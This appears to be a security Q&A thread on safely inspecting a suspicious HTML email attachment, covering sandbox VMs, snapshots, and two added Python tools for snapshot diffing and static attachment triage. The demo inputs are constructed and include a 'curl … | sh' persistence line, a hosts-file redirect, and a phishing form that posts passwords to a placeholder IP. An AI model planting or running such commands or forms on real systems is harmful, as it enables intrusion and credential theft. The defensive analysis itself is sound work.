I received a pretty blatantly spammy email to my Gmail account. Attached to the email is a supposed HTML file. My first hunch was that it was probably one of the following:

- A nasty executable file masquerading as a simple HTML file, or
- An actual HTML file meant to be opened in a browser in a phishing attack.

My guess is that it really is an HTML file, since Gmail claims the attachment is only 1K in size. I know I should probably just mark this as spam and get on with my life, but my curiosity is getting the best of me. I really want to know what's in that attachment. I'm at the beginning of a career shift into the security field, and I would love to pick apart this real-world example of something potentially nasty and see how it ticks.

Is there a safe way to go about downloading it to a sandboxed location and inspecting the contents? I'm thinking a LiveCD or a VM would be a safe environment. I would prefer to do it in a clean, un-networked environment, but in any case, I'll still be logging into my Gmail account to download the thing.

3. HTML page with JavaScript code attempting to exploit a vulnerability in your browser.
4. HTML page with an embedded Java applet attempting to exploit a vulnerability in the JVM.
5. HTML page with an embedded Flash file attempting to exploit a vulnerability in Flash Player.
6. The email itself, before you open the attachment, could try to exploit a vulnerability in your email client.

For this purpose, I have the following setup: I have a snapshot saved for the VM after a fresh OS install. I also take two snapshots with What Changed? and TrackWinstall. I copy files only in the direction Host -> VM, using a free ISO creator. Then I can have all the fun I want on the VM itself. I usually run the malware and study memory usage, CPU load, listening ports, networking attempts. I check the changes to the OS using What Changed? and TrackWinstall. The reason I have the whole setup is because I like to run the malware and see what it's trying to do.

I was talking to a colleague who performs malware analysis as a hobby and he told me about his setup; it might be different from what you might want for an occasional HTML attachment check. After installing the needed tools he takes a full-disk image using Clonezilla Live. The PC is connected to the Internet through a separate network. Whenever he finishes working on a sample, he reboots with Clonezilla and restores the full-disk image.

The simplest approach would be to use direct HTTP access to save the file and open it in Notepad to examine the contents. The file can't magically run itself if you treat it directly as data and you should be able to examine the contents. The key is to make sure you do not access it with anything which could automatically run something for you. To be a little more thorough, you could use a VM to actually let it go and see what it does, but for simple checking, treating it as a data file and accessing it with data analysis tools should be safe. There is a very slim chance of issues if they happen to be targeting a VM vulnerability, but the chances of your particular questionable file rapidly identifying and targeting a suitable VM vulnerability to break the sandbox are pretty close to nil unless you are being specifically targeted, and even then it's probably a low likelihood. If you've already opened the e-mail and just not the attachment, then you could simply save the attachment. If you are nervous about actually opening the e-mail, something like Lynx could probably be used.
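The before/after comparison the first answer gets from What Changed? and TrackWinstall, shown as an added example that is not those tools and not code from the thread: a snapshot maps every regular file under a root to its size and SHA-256, and diffing two snapshots lists what a sample added, removed or modified while it ran. The scratch tree, the file names and the "side effects" are constructed for the demo; on a real analysis VM you would snapshot the system drive (or the directories you care about) before detonation and again afterwards.

```python
"""Before/after snapshot diff of a directory tree.

Added example illustrating the What Changed?-style check from the first
answer; it is not that tool and not code from the thread. A snapshot maps
each regular file to (size, sha256); diffing two snapshots lists what a
sample added, removed or modified between them. The demo builds its own
scratch tree (constructed input), so it runs offline and touches nothing else.
"""
import hashlib
import os
import tempfile


def snapshot(root):
    """Map relative path -> (size, sha256) for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):  # record targets, not the links themselves
                continue
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            result[os.path.relpath(path, root)] = (os.path.getsize(path), digest)
    return result


def diff_snapshots(before, after):
    """Return sorted lists of paths added, removed and modified between snapshots."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return {"added": added, "removed": removed, "modified": modified}


def _write(root, rel, data):
    """Helper for the demo: write bytes to root/rel, creating parent dirs."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Snapshot a constructed tree, mimic a sample's side effects, snapshot again, diff."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "etc/hosts", b"127.0.0.1 localhost\n")
        _write(root, "home/user/notes.txt", b"nothing to see\n")
        _write(root, "tmp/installer.html", b"<html></html>")
        before = snapshot(root)
        # Constructed side effects standing in for what a sample might do:
        # a hosts-file redirect, a persistence hook, and cleanup of its dropper.
        _write(root, "etc/hosts", b"127.0.0.1 localhost\n198.51.100.7 bank.example\n")
        _write(root, "home/user/.profile", b"curl http://198.51.100.7/x | sh\n")
        os.remove(os.path.join(root, "tmp/installer.html"))
        after = snapshot(root)
        return diff_snapshots(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Hashing contents rather than trusting mtimes matters here: a sample that touches a file back to its old timestamp still changes its digest. Untouched files in the diff output (`notes.txt` above) are the noise you are filtering out when you read a real run.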
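The "treat it as data" approach from the second answer, carried a step further than Notepad, as an added example that is not code from the thread: the attachment is carved out of the saved message with the standard library's email parser, its real type is read from its leading bytes rather than from the .html extension (which settles the asker's executable-versus-HTML question), and the HTML is walked with html.parser to inventory scripts, forms, remote resources and plugin tags without ever rendering it or running script. The message, its addresses and the phishing page inside it are constructed for the demo; a real input would be the message saved as .eml from the mail client and opened with `open(path, "rb")`.

```python
"""Static triage of a suspicious e-mail attachment, handled strictly as bytes.

Added example (not code from the original thread). Nothing here renders the
HTML or evaluates script: the attachment is extracted with the stdlib email
parser, fingerprinted by its first bytes, and its markup is walked with
html.parser to list scripts, forms, remote references and plugin tags.
The sample message below is constructed for the demo.
"""
import email
import hashlib
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Leading-byte signatures that expose an executable or container dressed up
# with an .html name. Checked before any HTML heuristics.
MAGIC = [
    (b"MZ", "pe-executable"),
    (b"\x7fELF", "elf-executable"),
    (b"PK\x03\x04", "zip-container"),
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0", "ole2-document"),
]

# Substrings in inline script that commonly mark obfuscated or dropper code.
SUSPICIOUS_JS = ("eval(", "unescape(", "fromCharCode", "document.write", "atob(")


def classify(data: bytes) -> str:
    """Name the file type from its first bytes, ignoring the claimed extension."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")[:512].lower()
    if head.startswith(b"<") or b"<html" in head or b"<!doctype html" in head:
        return "html"
    return "unknown"


class Inventory(HTMLParser):
    """Collect script, form, password-input, link and plugin tags; evaluates nothing."""

    def __init__(self):
        super().__init__()
        self.scripts, self.forms, self.password_inputs = [], [], 0
        self.remote, self.plugins = [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.remote.append(a["src"])
        elif tag == "form":
            self.forms.append((a.get("action", ""), a.get("method", "get").lower()))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag in ("a", "link") and a.get("href"):
            self.remote.append(a["href"])
        elif tag in ("iframe", "img", "embed", "object", "applet"):
            self.remote.append(a.get("src") or a.get("data") or a.get("code") or "")
            if tag in ("embed", "object", "applet"):  # Flash / Java / other plugins
                self.plugins.append(tag)
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.remote.append(a.get("content", ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.scripts.append(data.strip())


def triage_attachment(raw_message: bytes) -> list:
    """Return one report dict per attachment; the message is parsed, never displayed."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    reports = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        report = {
            "filename": part.get_filename(),
            "declared_type": part.get_content_type(),
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "actual_type": classify(data),
        }
        if report["actual_type"] == "html":
            inv = Inventory()
            inv.feed(data.decode("utf-8", errors="replace"))
            report.update(
                scripts=inv.scripts,
                forms=inv.forms,
                password_inputs=inv.password_inputs,
                remote=[u for u in inv.remote if u],
                plugins=inv.plugins,
                js_indicators=sorted({k for k in SUSPICIOUS_JS for s in inv.scripts if k in s}),
            )
        reports.append(report)
    return reports


def build_sample() -> bytes:
    """Constructed spam message carrying a phishing-style HTML attachment (not a real sample)."""
    html = (
        b'<html><body><form action="http://192.0.2.10/login.php" method="post">'
        b'<input name="user"><input type="password" name="pass"></form>'
        b'<script>eval(unescape("%64%6F%63"));</script>'
        b'<a href="http://192.0.2.10/help">Help</a></body></html>'
    )
    msg = EmailMessage()
    msg["From"] = "Account Team <no-reply@example.net>"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "Your account has been limited"
    msg.set_content("Please open the attached form to restore access.")
    msg.add_attachment(html, maintype="text", subtype="html", filename="form.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for r in triage_attachment(build_sample()):
        for k, v in r.items():
            print(f"{k}: {v}")
```

The report is enough to answer the original question on its own: an `actual_type` of `pe-executable` under a `.html` name is the first hunch confirmed, while an HTML file whose only form posts a password field to an IP address is the second. The hash is what you would search or share instead of the file itself, and nothing in the script has been executed, so the VM is only needed if you then decide to watch the page behave.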